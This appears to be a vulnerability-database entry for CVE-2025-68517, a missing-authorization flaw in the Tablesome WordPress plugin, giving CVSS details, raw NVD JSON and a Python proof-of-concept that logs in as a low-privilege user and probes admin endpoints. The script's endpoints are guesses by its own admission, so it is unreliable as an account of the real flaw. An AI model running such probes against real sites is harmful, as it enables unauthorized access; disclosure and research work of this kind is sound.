Security Vulnerability Report
中文
CVE-2025-68517 CVSS 5.4 MEDIUM

CVE-2025-68517

Published: 2025-12-24 13:16:21
Last Modified: 2026-04-27 19:16:27

Description

Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Tablesome <= 1.1.35.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68517 Tablesome Broken Access Control PoC # Affected: Tablesome <= 1.1.35.1 # Type: Missing Authorization import requests import sys target = "http://target-wordpress-site.com" username = "low_privilege_user" password = "user_password" session = requests.Session() # Login to WordPress login_url = f"{target}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } response = session.post(login_url, data=login_data, allow_redirects=False) if "wordpress_logged_in" not in str(session.cookies) and response.status_code != 302: print("[-] Login failed") sys.exit(1) print("[+] Login successful") # Exploit: Access admin-only endpoint without proper authorization # Replace endpoint with actual vulnerable Tablesome endpoint tablesome_endpoints = [ "/wp-json/tablesome/v1/tables", "/wp-admin/admin-ajax.php?action=tablesome_get_tables", "/wp-json/tablesome/v1/settings" ] for endpoint in tablesome_endpoints: url = f"{target}{endpoint}" print(f"\n[*] Testing endpoint: {url}") response = session.get(url, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: Endpoint accessible with low privilege account") print(f"Response: {response.text[:500]}") elif response.status_code == 403: print(f"[-] Protected: 403 Forbidden") else: print(f"[*] Status: {response.status_code}") print("\n[!] PoC completed - verify results manually")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68517", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:21.393", "lastModified": "2026-04-27T19:16:27.357", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}